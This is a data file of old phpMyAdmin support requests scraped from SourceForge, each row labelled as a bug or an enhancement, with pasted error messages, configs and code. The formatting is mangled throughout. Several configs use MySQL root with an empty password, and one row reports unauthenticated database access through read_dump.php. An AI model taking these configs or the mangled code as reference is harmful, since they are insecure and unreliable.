ldi check.php Missing db ldi check.php Missing table Since I have already selected the database, and can only perform the operation from within a selected table, I assume this is a bug.
phpMyAdmin Version 2.5.3 Windows 2000 professional PHP 4.33 Apache 2 MySQL 4.0 Thank you Matthew matthew.waygood onet.co.uk) Original URL https sourceforge.net p phpmyadmin support requests 331 https sourceforge.net p phpmyadmin support requests 331 Original author anonymous","bug"
"24444","2148","unable to parse url.
We have a couple of tables that have 200 fields.
When we try to Browse these tables with phpMyAdmin 2.5.3 and previous versions), we get a series of errors like Warning unable to parse url tbl change.php?lang=en iso 8859 1 amp;amp;server=1 amp;amp;db=blahblahblah in var www html admin phpMyAdmin 2.5.3 libraries common.lib.php on line 1772 where the amp;quot;urls amp;quot; seem to have been truncated to 965 characters, and are therefore invalid urls.
What would control that truncation?
Is there a configuration variable in php.ini or phpMyAdmin s config.inc.php that would control this?
Or, how can we get around this?
Original URL https sourceforge.net p phpmyadmin support requests 332 https sourceforge.net p phpmyadmin support requests 332 Original author boerm Found in version 2.5.3","bug"
"24444","2149","Relations???.
I followed the instructions in the documentation to use relationships between tables in a DB.
I created DB amp;quot;phpmyadmin amp;quot; with the script amp;quot;tables.sql amp;quot;; I wrote the names in the correct places in the file amp;quot;config.ini.php amp;quot; ...but the relationships don t run!!!!!!!
PhpMyAdmin recognise the PMAdb but not the tables...why???
Thanks by Marco Excuse me for my English but I m Italian.
I use MacOS X 10.2...good bye =D Original URL https sourceforge.net p phpmyadmin support requests 333 https sourceforge.net p phpmyadmin support requests 333 Original author anonymous","bug"
"24444","2150","Multi column foreign keys create errors on various pages.
With attached table strucure, various errors turn up, with at the base, some undefined indexes, reported by xdebug Notice Undefined index ref table name in usr local www data dist phpMyAdmin libraries relation.lib.php on line 329 Call Stack Function Location 1 \{main\} ) usr local www data dist phpMyAdmin sql.php 0 2 pma displaytable ) usr local www data dist phpMyAdmin sql.php 632 3 pma getforeigners ) usr local www data dist phpMyAdmin libraries display tbl.lib.php 1627 Notice Undefined index ref index list in usr local www data dist phpMyAdmin libraries relation.lib.php on line 330 Call Stack Function Location 1 \{main\} ) usr local www data dist phpMyAdmin sql.php 0 2 pma displaytable ) usr local www data dist phpMyAdmin sql.php 632 3 pma getforeigners ) usr local www data dist phpMyAdmin libraries display tbl.lib.php 1627 I have several constraints on the tables, but the survey entries table is the only one with the problem, therefore I think it s created by the multi column constraint CONSTRAINT `0 97` FOREIGN KEY `se svid`, `se qid`) REFERENCES `survey questions` `svq svmid`, `svq qnumber`) ON DELETE CASCADE ON UPDATE CASCADE Original URL https sourceforge.net p phpmyadmin support requests 334 https sourceforge.net p phpmyadmin support requests 334 Original author nyvlem","bug"
"24444","2151","PhpMyAdmin on XP Pro laptop.
I m a newby trying to set up my laptop to run PhpMyAdmin for MySQL using the local IIS as a server XP Professional) I ve got PhpMyAdmin loaded in my wwwroot directory and get the message that I don t have authority to access this file when I point my browser IE6.0) to localhost pcpMyAdmin.
When I select properties for the wwwroot directory, I don t have a security tab to set permissions.
Does anyone have a step by step workaround to resolve this so I can run PhpMyAdmin on this machine?
I m using the machine as a developmental computer with a local testing server and then uploading to a remote website.
Thanks for any help.
Original URL https sourceforge.net p phpmyadmin support requests 336 https sourceforge.net p phpmyadmin support requests 336 Original author ktc","bug"
"24444","2152","Error in translating a select statment to php.
It seems that there is an error when you turn a select statment into a php statment, the amp;quot;Limit amp;quot; clause in the query resets to the default 0, 30 for example, when I turned this SELECT `path` FROM `pictures` WHERE 1 AND `pid` =0 LIMIT 0 , 1 into a PHP statment it turned out like sql = SELECT `path` .
FROM `pictures` .
WHERE 1 AND `pid` =0 LIMIT 0, 30 ; the LIMIT clause has been reset to the default 30.
I put latest CVS as the version number however it is 2.5.4 rc1 Original URL https sourceforge.net p phpmyadmin support requests 337 https sourceforge.net p phpmyadmin support requests 337 Original author anonymous","bug"
"24444","2153","Problem export Database.
Hi, Following problem occurs with the actual version when using the exporting functions See following script amp;quot;notice.... amp;quot;.
The Version PHPMyAdmin 2.3.0 works fine doing the same.
Is this a bug?
Script from export phpMyAdmin SQL Dump version 2.5.4 rc1 http www.phpmyadmin.net Host localhost Erstellungszeit 01.
Januar 1970 um 01 00 Server Version 3.23.38 PHP Version 4.3.2 RC2 Datenbank `CMSluesta` Tabellenstruktur fxc3xbcr Tabelle `tblalias` DROP TABLE IF EXISTS `tblalias`; CREATE TABLE `tblalias` `userID` bigint 20) NOT NULL default 0 , `groupID` bigint 20) NOT NULL default 0 , `AliasName` varchar 255) NOT NULL default ) TYPE=MyISAM; Daten fxc3xbcr Tabelle `tblalias` amp;lt;br amp;gt; amp;lt;b amp;gt;Notice amp;lt; b amp;gt; Undefined offset 0 in amp;lt;b amp;gt;c \apache\htdocs\phpmyadmin25rc1 \libraries\export\sql.php amp;lt; b amp;gt; on line amp;lt;b amp;gt;447 amp;lt; b amp;gt; amp;lt;br amp;gt; amp;lt;br amp;gt; amp;lt;b amp;gt;Notice amp;lt; b amp;gt; Undefined index in amp;lt;b amp;gt;c \apache\htdocs\phpmyadmin25rc1 \libraries\export\sql.php amp;lt; b amp;gt; on line amp;lt;b amp;gt;449 amp;lt; b amp;gt; amp;lt;br amp;gt; amp;lt;br amp;gt; amp;lt;b amp;gt;Notice amp;lt; b amp;gt; Undefined offset 1 in amp;lt;b amp;gt;c \apache\htdocs\phpmyadmin25rc1 \libraries\export\sql.php amp;lt; b amp;gt; on line amp;lt;b amp;gt;447 amp;lt; b amp;gt; amp;lt;br amp;gt; amp;lt;br amp;gt; amp;lt;b amp;gt;Notice amp;lt; b amp;gt; Undefined index in amp;lt;b amp;gt;c \apache\htdocs\phpmyadmin25rc1 \libraries\export\sql.php amp;lt; b amp;gt; on line amp;lt;b amp;gt;449 amp;lt; b amp;gt; amp;lt;br amp;gt; amp;lt;br amp;gt; amp;lt;b amp;gt;Notice amp;lt; b amp;gt; Undefined offset 2 in amp;lt;b amp;gt;c \apache\htdocs\phpmyadmin25rc1 \libraries\export\sql.php amp;lt; b amp;gt; on line amp;lt;b amp;gt;447 amp;lt; b amp;gt; amp;lt;br amp;gt; amp;lt;br amp;gt; amp;lt;b amp;gt;Notice amp;lt; b amp;gt; Undefined index in amp;lt;b amp;gt;c \apache\htdocs\phpmyadmin25rc1 \libraries\export\sql.php amp;lt; b amp;gt; on line amp;lt;b amp;gt;449 amp;lt; b amp;gt; amp;lt;br amp;gt; etc.
Original URL https sourceforge.net p phpmyadmin support requests 335 https sourceforge.net p phpmyadmin support requests 335 Original author anonymous","bug"
"24444","2154","bug in cookies auth blowfish.php)?.
I tried to set the authentication cookies outside of phpmyadmin with setcookie amp;quot;pma cookie username amp;quot;, amp;quot;user amp;quot;,0, amp;quot; phpMyAdmin amp;quot;); setcookie amp;quot;pma cookie password amp;quot;, amp;quot;encodedpw amp;quot;,0, amp;quot; phpMyAdmin amp;quot;); setcookie amp;quot;lang amp;quot;, amp;quot;de iso 8859 1 amp;quot;,0, amp;quot; phpMyAdmin amp;quot;); as a result I got this notice while calling the phpMyAdmin Home Notice Undefined offset 1 in srv www htdocs phpMyAdmin libraries blowfish.php on line 436 Notice Undefined offset 0 in srv www htdocs phpMyAdmin libraries blowfish.php on line 436 The cookie password was correctly decrypted by the decrypt function, but after the password are cryptic letters...
I modified 3 lines in libraries blowfish.php and now its working line 436 438) list L, R) = array values unpack N , block)); if strlen L)==0) return ; if strlen R)==0) return ; Original URL https sourceforge.net p phpmyadmin support requests 338 https sourceforge.net p phpmyadmin support requests 338 Original author cerhardt","bug"
"24444","2155","Can t get your software.
Your site was recently recommended to me for finding software but at the same time I was warned that once I find it s name on your site go use yahoo.com to find it somewhere else in order to download it.
I forgot that last bit of advice until today.
I m at wits end trying to figure out how to download software from your site.
No matter where I click I get sent in circles and only end up back at the same place and can t download.
So I went to Yahoo.com and searched for atutor in this example) and found it at another site and clicked download and got it in a snap.
I m sure you have people who learn how to get software at your site but it s just too complicated for software developers like me who just need got get it and go.
Good luck, I ll look elsewhere for the download.
Original URL https sourceforge.net p phpmyadmin support requests 339 https sourceforge.net p phpmyadmin support requests 339 Original author anonymous","bug"
"24444","2156","Error in final PDF File.
I noticed an error in entity relationship model in my pdf document.
There are some relations, that I didn t put in relationship area.
I have a table, with an id relation to many other tables.
And there s a table that relates, but hasn t the right datatype to relate varchar).
A connection line to the table is set.
I ve no idea how this could happen.
Greetings Mike mike.greubel pro entertain.de Original URL https sourceforge.net p phpmyadmin support requests 340 https sourceforge.net p phpmyadmin support requests 340 Original author anonymous","bug"
"24444","2157","Internet Explorer Debug Error.
I repeatedly get a debug error when viewing various pages within phpmyadmin especially when clicking databases from index.php).
The error is always a syntax error, usually on line 1.
In addition, the logo among other pictures) doesn t get displayed, but when i type its path into the address bar, it appears fine.
I haven t got a clue, what to do )..
Thanks in advance, James Randle pigeonrandle hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 341 https sourceforge.net p phpmyadmin support requests 341 Original author anonymous","bug"
"24444","2158","Random Warning error on Mac OSX.
I have installed phpMyAdmin 2.5.3 on my G4 bipro 1.25) with mac OS X 10.2.6 apache 2.0.46, mysql 4.0.15 and PHP 4.3.2).
the config is OK.
Sometimes I can connect on my phpmyadmin home page and sometimes one or all of the frames send me a message like amp;quot;Warning main .
libraries charset conversion.lib.php) failed to open stream No such file or directory in ... on line 195 ..... amp;quot; And then undefined function and fatal error...
When I reload the page sometimes It s OK and sometimes there is always a problem.... Is there a solution to this problem ???
thanx for answer Stephane Original URL https sourceforge.net p phpmyadmin support requests 342 https sourceforge.net p phpmyadmin support requests 342 Original author gigraphe Found in version 2.5.3","bug"
"24444","2159","IE6 displays JavaScript Error Access Denied.
phpMyAdmin 2.5.3 Internet Explorer 6, SP1 Windows XP, SP1 Internet Explorer 6 shows JavaScript error Access Denied.
Do you wish to debug?
This occurs every time frames are refreshed.
Remember that frames are refreshed automatically through JavaScript when for example you select a database from left frame or create a database from the right frame.
This happens when cfg[ PmaAbsoluteUri ] = http machine phpMyAdmin ; When i set the above variable to contain my machine name This does not happens when cfg[ PmaAbsoluteUri ] = http localhost phpMyAdmin ; When i set the above variable to contain localhost but then I cannot see CSS and images if I access phpMyAdmin from a netwok machine Possible Cause There most obvoius cause is If i open http localhost phpmyadmin the page that contains the frameset, the frameset contains a mix of http localhost framexx.php and http machine framexx.php and for obvois security reasons, Javascript on http domain1 page1 cannot and should not have access to the scriptable objects on http domain2 page2.
Hopefully this issue will be rectified in the future releases.
If you need more information feel free contact me.
Salman salmanarshad2000 yahoo.com Original URL https sourceforge.net p phpmyadmin support requests 343 https sourceforge.net p phpmyadmin support requests 343 Original author anonymous","bug"
"24444","2160","entire DB access w o username password.
the following trick give access to entire database without the need of username password.. www.domainname.com phpfoldername read dump.php I want to fix this security hole..
Please help.
my email id is saurabh.dhawan indiatimes.com Original URL https sourceforge.net p phpmyadmin support requests 344 https sourceforge.net p phpmyadmin support requests 344 Original author anonymous","bug"
"24444","2161","Access Denied.
I am getting an access denied error through the link that cPanel gives me.
Original URL https sourceforge.net p phpmyadmin support requests 345 https sourceforge.net p phpmyadmin support requests 345 Original author anonymous","bug"
"24444","2162","wont display all rows.
hello, i am using phpMyAdmin to admin my MySQL DB.
Its a great tool.
Just one problem.
My website is self sustaining, so i rarely do anything besides answer e mails.
But yesterday i got bored and went in and looked at my Tables.
PMA 630 rows.
This got me worried because this table stores my user login info for all my users, well over 6000 users.
I quickly write my own tool to output the number or rows in that table and it says 6874\.
Why isnt PMA not show them all?
is this a known bug?
is there a fix?
Is PMA not meant for large databases?
thank you for your help, Matt Original URL https sourceforge.net p phpmyadmin support requests 346 https sourceforge.net p phpmyadmin support requests 346 Original author mattjp88","bug"
"24444","2163","Root User Access Denied.
Running phpMyAdmin 2.5.4 on MacOSX 10.2.8 with Standard apple shipped appache installed PHP 4.3.3 MySQL enabled) and MySQL standard MacOSX standard Package 4.1.0 alpha configured root s password via term TCSH) and tested root access via mysql u root p and was able to access successfully.
I have created 1 new database in the term.
Installed phpMyAdmin configured to connect via tcp, localhost, and auth through http config gives me an error telling me to upgrade my client).
When I launch phpMyAdmin and login using the root identity I recieve an access denied.
Help?
Below is my config ======================================== The cfg[ Servers ] array starts with cfg[ Servers ][1].
Do not use cfg[ Servers ][0].
You can disable a server config entry by setting host to .
i ; cfg[ Servers ][ i][ host ] = localhost ; MySQL hostname or IP address cfg[ Servers ][ i][ port ] = ; MySQL port leave blank for default port cfg[ Servers ][ i][ socket ] = ; Path to the socket leave blank for default socket cfg[ Servers ][ i][ connect type ] = tcp ; How to connect to MySQL server tcp or socket ) cfg[ Servers ][ i][ compress ] = FALSE; Use compressed protocol for the MySQL connection requires PHP amp;gt;= 4.3.0) cfg[ Servers ][ i][ controluser ] = ; MySQL control user settings this user must have read only cfg[ Servers ][ i][ controlpass ] = ; access to the amp;quot;mysql user amp;quot; and amp;quot;mysql db amp;quot; tables) cfg[ Servers ][ i][ auth type ] = http ; Authentication method config, http or cookie based)?
cfg[ Servers ][ i][ user ] = root ; MySQL user cfg[ Servers ][ i][ password ] = ; MySQL password only needed with config auth type) cfg[ Servers ][ i][ only db ] = ; If set to a db name, only this db is displayed at left frame It may also be an array of db names cfg[ Servers ][ i][ verbose ] = ; Verbose name for this host leave blank to show the hostname cfg[ Servers ][ i][ pmadb ] = ; Database used for Relation, Bookmark and PDF Features see scripts create tables.sql) leave blank for no support DEFAULT phpmyadmin cfg[ Servers ][ i][ bookmarktable ] = ; Bookmark table leave blank for no bookmark support DEFAULT pma bookmark cfg[ Servers ][ i][ relation ] = ; table to describe the relation between links see doc) leave blank for no relation links support DEFAULT pma relation cfg[ Servers ][ i][ table info ] = ; table to describe the display fields leave blank for no display fields support DEFAULT pma table info cfg[ Servers ][ i][ table coords ] = ; table to describe the tables position for the PDF schema leave blank for no PDF schema support DEFAULT pma table coords cfg[ Servers ][ i][ pdf pages ] = ; table to describe pages of relationpdf leave blank if you don t want to use this DEFAULT pma pdf pages cfg[ Servers ][ i][ column info ] = ; table to store column information leave blank for no column comments mime types DEFAULT pma column info cfg[ Servers ][ i][ history ] = ; table to store SQL history leave blank for no SQL query history DEFAULT pma history cfg[ Servers ][ i][ verbose check ] = TRUE; set to FALSE if you know that your pma tables are up to date.
This prevents compatibility checks and thereby increases performance.
cfg[ Servers ][ i][ AllowDeny ][ order ] Host authentication order, leave blank to not use = ; cfg[ Servers ][ i][ AllowDeny ][ rules ] Host authentication rules, leave blank for defaults = array ); Original URL https sourceforge.net p phpmyadmin support requests 347 https sourceforge.net p phpmyadmin support requests 347 Original author dergoog Found in version 2.5.4 rc2","bug"
"24444","2164","Bad error quot;can open file quot;.
I get this message on my site and in the database itself.... amp;quot;Can t open file sessions.MYI .
errno 145) amp;quot;.
In PHPmyAdmin, the table sessions says it is in use .
I am very new to using this and am not sure what I can do to remedy this.
I am using the OScommerce open source) shopping cart that generated all of the database back end.
Right now the site doesn t function and could use a quick hand...thanks Dumb Newbie Original URL https sourceforge.net p phpmyadmin support requests 348 https sourceforge.net p phpmyadmin support requests 348 Original author anonymous Found in version 2.4.0","bug"
"24444","2165","Authentication with Opera.
I have Apache 2.0.47 plus PHP 4.3.3 plus MySQL 4.0.16 on Windows2000.
In IE all works fine, but in Opera...
When i select auth type = config all works OK.
But i need some security, so i ve set auth type = http , and problem occurs.
I can login, select database, select table, browse table .
But when I press Edit link to edit record), i receive Error 401 Autentication Required.
I try to set auth type = config and use authentication with .htaccess .htpassword files placed in phpMyAdmin directory basic Apache http Authentication method).
And I have some results.
Both described methods work fine in IE.
I try Opera 7.11, 7.20 and 7.21 with phpMyAdmin 2.0.2 and 2.0.4 in various combinations.
I have some VirtualHosts on same Apache server, one uses .htaccess htpassword authentication, one uses http authentication in PHP PHP AUTH USER and PHP AUTH PW server variables), and i have no bugs.
So, possible bug is in tbl change.php file or some includes...
Original URL https sourceforge.net p phpmyadmin support requests 349 https sourceforge.net p phpmyadmin support requests 349 Original author anonymous","bug"
"24444","2166","Images not showing in browser.
I ve just installed phpMyAdmin 2.5.4 and I thought I d followed all of the installation instructions and setup the config.inc.php file correctly.
Have secured the folder .haccess etc, but when I call the page it delivers ok but all images are missing.
using IE vs 6 marshall.potts aja4hr.com Original URL https sourceforge.net p phpmyadmin support requests 350 https sourceforge.net p phpmyadmin support requests 350 Original author anonymous Found in version 2.5.4","bug"
"24444","2167","can t create table in database.
Tried to create a table in a test database and recvd the following Error SQL query CREATE TABLE `test` `test21` VARCHAR 12 ) NOT NULL , `test21` VARCHAR 12 ) NOT NULL ) COMMENT = test21 MySQL said 1060 Duplicate column name test21 this was done by selecting database, then select table test, then create new new table with 1 feild.
Thanks, Wade wade nerdfest.com Original URL https sourceforge.net p phpmyadmin support requests 351 https sourceforge.net p phpmyadmin support requests 351 Original author anonymous","bug"
"24444","2168","insert impossible.
whenever i want to insert a new row i get the following error after i hit amp;quot;Go amp;quot; Parse error parse error, unexpected in usr local psa home vhosts embege.com httpdocs dba tbl replace.php on line 121 i never had this problem yet.
now i switched to 2.5.4 and i cant insert rows anymore.
Original URL https sourceforge.net p phpmyadmin support requests 352 https sourceforge.net p phpmyadmin support requests 352 Original author grumble","bug"
"24444","2169","linking tables.
Hi, I installed amp;quot;xampp amp;quot; which includes phpmyadmin with the install.
I am getting the error that tables aren t set up for linking and to see the documentation on how to fix it.
I thought MySQL was designed with the idea of relational databases in mind and thought that would be a given and no config would be necessary.
I created my own .sql install file for creating the PMA tables but I can t seem to get the config file to take my changes.
After I make the changes, phpmyadmin stops working.
I realize that it s probably a syntax error.
Could you provide me with what it should be exactly so I can find out what I am getting wrong?
That s a LOT of changes to make in order for linking between tables to work.
Do you, by any chance, provide a text file with what it should be for newbies like me?
lol.
OMG, I am so lost, lol.
Also, if I don t do anything to the config file, but use some other program like OpenOffice.org to connect to MySQL, phpmyadmin stops working.
So, I don t know if code is being deleted somehow or what when I use other programs to connect to the database.
Thanks for your help in advance.
Barb Original URL https sourceforge.net p phpmyadmin support requests 353 https sourceforge.net p phpmyadmin support requests 353 Original author ogl barb","enhancement"
"24444","2170","Trying to connect phpMyAdmin to MySQL.
Ok, I have tried and tried and tried to sucessfully hook phpMyAdmin to my MySql database.
I ve gone over the documentation about 100 times trying different things, but the outcome is the same.
Eveytime I open my browser and go to http localhost phpMyAdmin index.php I see the php source code rather than anythign to do with MySQl database tables.
amp;lt;?php Id index.php,v 1.54 2003 07 11 09 35 05 rabus Exp vim expandtab sw=4 ts=4 sts=4 Gets core libraries and defines some variables require .
libraries grab globals.lib.php ); require .
libraries common.lib.php ); Gets the default font sizes PMA setFontSizes ); Gets the host name loic1 2001 25 11 use the new globals arrays defined with php 4.1 if empty HTTP HOST)) \{ if !empty ENV) amp;amp; amp;amp; isset ENV[ HTTP HOST ])) \{ HTTP HOST = ENV[ HTTP HOST ]; \} else if !empty HTTP ENV VARS) amp;amp; amp;amp; isset HTTP ENV VARS[ HTTP HOST ])) \{ HTTP HOST = HTTP ENV VARS[ HTTP HOST ]; \} else if getenv HTTP HOST )) \{ HTTP HOST = getenv HTTP HOST ); \} else \{ HTTP HOST = ; \} \} Defines the frameset loic1 If left light mode amp;gt; urldecode the db name if isset lightm db)) \{ no longer urlencoded because of html entities in the db name db = urldecode lightm db); db = lightm db; unset lightm db); \} url query = PMA generate common url isset db) ?
db ); header Content Type text html; charset= .
GLOBALS [ charset ]); require .
libraries relation.lib.php ); cfgRelation = PMA getRelationsParam ); if cfg[ QueryHistoryDB ] amp;amp; amp;amp; cfgRelation[ historywork ]) \{ PMA purgeHistory cfg[ Server ][ user ]); \} phpmain hash = md5 cfg[ PmaAbsoluteUri ]); phpmain hash js = time ); ?
amp;gt; amp;lt;!DOCTYPE html PUBLIC amp;quot; W3C DTD XHTML 1.0 Frameset EN amp;quot; amp;quot;http www.w3.org TR xhtml1 DTD xhtml1 frameset.dtd amp;quot; amp;gt; amp;lt;html xmlns= amp;quot;http www.w3.org 1999 xhtml amp;quot; xml lang= amp;quot; amp;lt;?php echo available languages[ lang][2]; ?
amp;gt; amp;quot; lang= amp;quot; amp;lt;?php echo available languages[ lang][2]; ?
amp;gt; amp;quot; dir= amp;quot; amp;lt;?php echo text dir; ?
amp;gt; amp;quot; amp;gt; amp;lt;head amp;gt; amp;lt;title amp;gt;phpMyAdmin amp;lt;?php echo PMA VERSION; ?
amp;gt; amp;lt;?
php echo HTTP HOST; ?
amp;gt; amp;lt; title amp;gt; amp;lt;meta http equiv= amp;quot;Content Type amp;quot; content= amp;quot;text html; charset= amp;lt;?php echo charset; ?
amp;gt; amp;quot; amp;gt; amp;lt;link rel= amp;quot;stylesheet amp;quot; type= amp;quot;text css amp;quot; href= amp;quot;.
css phpmyadmin.css.php?lang= amp;lt;?php echo lang; ?
amp;gt; amp;amp;amp;js frame=right amp;quot; amp;gt; amp;lt; head amp;gt; amp;lt;?php if cfg[ QueryFrame ]) \{ if cfg[ QueryFrameJS ]) \{ echo amp;lt;script type= amp;quot;text javascript amp;quot; amp;gt; .
amp;quot;\n amp;quot;; echo amp;lt;!
.
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt;frameset cols= amp;quot; .
cfg[ LeftWidth ] .
, amp;quot; rows= amp;quot; amp;quot; border= amp;quot;1 amp;quot; frameborder= amp;quot;1 amp;quot; framespacing= amp;quot;0 amp;quot; amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt;frameset rows= amp;quot; , 50 amp;quot; framespacing= amp;quot;0 amp;quot; frameborder= amp;quot;0 amp;quot; border= amp;quot;0 amp;quot; amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt;frame src= amp;quot;left.php?
.
url query .
amp;amp;amp;hash= .
phpmain hash .
phpmain hash js .
amp;quot; name= amp;quot;nav amp;quot; frameborder= amp;quot;0 amp;quot; amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt;frame src= amp;quot;queryframe.php?
.
url query .
amp;amp;amp;hash= .
phpmain hash .
phpmain hash js .
amp;quot; name= amp;quot;queryframe amp;quot; frameborder= amp;quot;0 amp;quot; scrolling= amp;quot;no amp;quot; amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt; frameset amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt;frame src= amp;quot; .
empty db) ?
cfg[ DefaultTabServer ] cfg [ DefaultTabDatabase ]) .
?
.
url query .
amp;quot; name= amp;quot;phpmain .
phpmain hash .
phpmain hash js .
amp;quot; border= amp;quot;0 amp;quot; frameborder= amp;quot;0 amp;quot; amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt;noframes amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt;body bgcolor= amp;quot; FFFFFF amp;quot; amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt;p amp;gt; .
str replace amp;quot; amp;quot;, amp;quot;\ amp;quot;, strNoFrames) .
amp;lt; p amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt; body amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt; noframes amp;gt;\ ); .
amp;quot;\n amp;quot;; echo document.writeln \ amp;lt; frameset amp;gt;\ ); .
amp;quot;\n amp;quot;; echo amp;gt; .
amp;quot;\n amp;quot;; echo amp;lt; script amp;gt; .
amp;quot;\n amp;quot;; echo amp;quot;\n amp;quot;; echo amp;lt;noscript amp;gt; .
amp;quot;\n amp;quot;; \} echo amp;lt;frameset cols= amp;quot; .
cfg[ LeftWidth ] .
, amp;quot; rows= amp;quot; amp;quot; border= amp;quot;1 amp;quot; frameborder= amp;quot;1 amp;quot; framespacing= amp;quot;0 amp;quot; amp;gt; .
amp;quot;\n amp;quot;; echo amp;lt;frameset rows= amp;quot; , 50 amp;quot; framespacing= amp;quot;0 amp;quot; frameborder= amp;quot;0 amp;quot; border= amp;quot;0 amp;quot; amp;gt; .
amp;quot;\n amp;quot;; echo amp;lt;frame src= amp;quot;left.php?
.
url query .
amp;amp;amp;hash= .
phpmain hash .
amp;quot; name= amp;quot;nav amp;quot; frameborder= amp;quot;0 amp;quot; amp;gt; .
amp;quot;\n amp;quot;; echo amp;lt;frame src= amp;quot;queryframe.php?
.
url query .
amp;amp;amp;hash= .
phpmain hash .
amp;quot; name= amp;quot;queryframe amp;quot; frameborder= amp;quot;0 amp;quot; scrolling= amp;quot;no amp;quot; amp;gt; .
amp;quot;\n amp;quot;; echo amp;lt; frameset amp;gt; .
amp;quot;\n amp;quot;; echo amp;lt;frame src= amp;quot; .
empty db) ?
cfg [ DefaultTabServer ] cfg [ DefaultTabDatabase ]) .
?
.
url query .
amp;quot; name= amp;quot;phpmain .
phpmain hash .
amp;quot; frameborder= amp;quot;0 amp;quot; amp;gt; .
amp;quot;\n amp;quot;; \} else \{ echo amp;lt;frameset cols= amp;quot; .
cfg[ LeftWidth ] .
, amp;quot; rows= amp;quot; amp;quot; border= amp;quot;1 amp;quot; frameborder= amp;quot;1 amp;quot; framespacing= amp;quot;0 amp;quot; amp;gt; .
amp;quot;\n amp;quot;; echo amp;lt;frame src= amp;quot;left.php?
.
url query .
amp;amp;amp;hash= .
phpmain hash .
amp;quot; name= amp;quot;nav amp;quot; frameborder= amp;quot;0 amp;quot; amp;gt; .
amp;quot;\n amp;quot;; echo amp;lt;frame src= amp;quot; .
empty db) ?
cfg [ DefaultTabServer ] cfg [ DefaultTabDatabase ]) .
?
.
url query .
amp;quot; name= amp;quot;phpmain .
phpmain hash .
amp;quot; frameborder= amp;quot;1 amp;quot; amp;gt; .
amp;quot;\n amp;quot;; \} ?
amp;gt; amp;lt;noframes amp;gt; amp;lt;body bgcolor= amp;quot; FFFFFF amp;quot; amp;gt; amp;lt;p amp;gt; amp;lt;?php echo strNoFrames; ?
amp;gt; amp;lt; p amp;gt; amp;lt; body amp;gt; amp;lt; noframes amp;gt; amp;lt; frameset amp;gt; amp;lt;?php if cfg[ QueryFrame ] amp;amp; amp;amp; cfg[ QueryFrameJS ]) \{ echo amp;lt; noscript amp;gt; .
amp;quot;\n amp;quot;; \} ?
amp;gt; amp;lt; html amp;gt; SO I Have no idea why this is not working, my config file looks like the following amp;lt;?php Id config.inc.php,v 1.204.2.1 2003 10 10 14 24 24 nijel Exp vim expandtab sw=4 ts=4 sts=4 phpMyAdmin Configuration File All directives are explained in Documentation.html Sets the php error reporting Please do not change this line!
if !isset old error reporting)) \{ error reporting E ALL); ini set display errors , 1 ); \} Your phpMyAdmin url Complete the variable below with the full url ie http www.your web.net path to your phpMyAdmin di rectory It must contain characters that are valid for a URL, and the path is case sensitive on some Web servers, for example Unix based servers.
In most cases you can leave this variable empty, as the correct value will be detected automatically.
However, we recommend that you do test to see that the auto detection code works in your system.
A good test is to browse a table, then edit a row and save it.
There will be an error message if phpMyAdmin cannot auto detect the correct value.
If the auto detection code does work properly, you can set to TRUE the cfg[ PmaAbsoluteUri DisableWarning ] variable below.
cfg[ PmaAbsoluteUri ] = http localhost phpMyAdmin ; Disable the default warning about cfg [ PmaAbsoluteUri ] not being set You should use this if and ONLY if the PmaAbsoluteUri auto detection works perfectly.
cfg[ PmaAbsoluteUri DisableWarning ] = FALSE; Disable the default warning that is displayed on the DB Details Structure page if any of the required Tables for the relationfeatures could not be found cfg[ PmaNoRelation DisableWarning ] = FALSE; The cookie auth type uses blowfish algorithm to encrypt the password.
If at least one server configuration uses cookie auth type, enter here a passphrase that will be used by blowfish.
cfg[ blowfish secret ] = ; Server s) configuration i = 0; The cfg[ Servers ] array starts with cfg[ Servers ] [1].
Do not use cfg[ Servers ][0].
You can disable a server config entry by setting host to .
i ; cfg[ Servers ][ i][ host ] = localhost ; MySQL hostname or IP address cfg[ Servers ][ i][ port ] = ; MySQL port leave blank for default port cfg[ Servers ][ i][ socket ] = ; Path to the socket leave blank for default socket cfg[ Servers ][ i][ connect type ] = tcp ; How to connect to MySQL server tcp or socket ) cfg[ Servers ][ i][ compress ] = FALSE; Use compressed protocol for the MySQL connection requires PHP amp;gt;= 4.3.0) cfg[ Servers ][ i][ controluser ] = root ; MySQL control user settings this user must have read only cfg[ Servers ][ i][ controlpass ] = ; access to the amp;quot;mysql user amp;quot; and amp;quot;mysql db amp;quot; tables) cfg[ Servers ][ i][ auth type ] = config ; Authentication method config, http or cookie based)?
cfg[ Servers ][ i][ user ] = root ; MySQL user cfg[ Servers ][ i][ password ] = ; MySQL password only needed with config auth type) cfg[ Servers ][ i][ only db ] = test ; If set to a db name, only this db is displayed at left frame It may also be an array of db names cfg[ Servers ][ i][ verbose ] = ; Verbose name for this host leave blank to show the hostname cfg[ Servers ][ i][ pmadb ] = ; Database used for Relation, Bookmark and PDF Features see scripts create tables.sql) leave blank for no support DEFAULT phpmyadmin cfg[ Servers ][ i][ bookmarktable ] = ; Bookmark table leave blank for no bookmark support Original URL https sourceforge.net p phpmyadmin support requests 354 https sourceforge.net p phpmyadmin support requests 354 Original author bsc michael","bug"
"24444","2171","1045 Access denied for user root localhost Using pass.
Hi, I am getting this error when I try to view http localhost phpmyadmin index.php Welcome to phpMyAdmin 2.5.4 phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection.
You should check the host, username and password in config.inc.php and make sure that they correspond to the information given by the administrator of the MySQL server.
